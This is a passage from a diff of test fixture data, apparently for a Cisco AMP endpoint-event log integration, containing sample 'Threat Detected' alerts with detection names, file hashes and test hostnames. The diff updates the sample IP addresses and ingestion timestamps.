Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898167100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2561,7 +2471,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2611,7 +2521,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2624,8 +2534,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070182611Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898171800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2647,7 +2557,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2697,7 +2607,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2714,8 +2624,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070184598Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898175800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":375000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595368\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2737,7 +2647,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2787,7 +2697,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2800,8 +2710,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070186589Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898180800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2823,7 +2733,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2873,7 +2783,7 @@ "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2886,8 +2796,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070188588Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "ingested": "2021-12-09T13:35:32.898186700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2909,7 +2819,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2956,7 +2866,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -2966,8 +2876,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070190593Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898192700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2989,7 +2899,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3036,7 +2946,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3046,8 +2956,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070192600Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898198600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -3069,7 +2979,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3116,7 +3026,7 @@ "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -3126,8 +3036,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:16.070194607Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", + "ingested": "2021-12-09T13:35:32.898204500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\"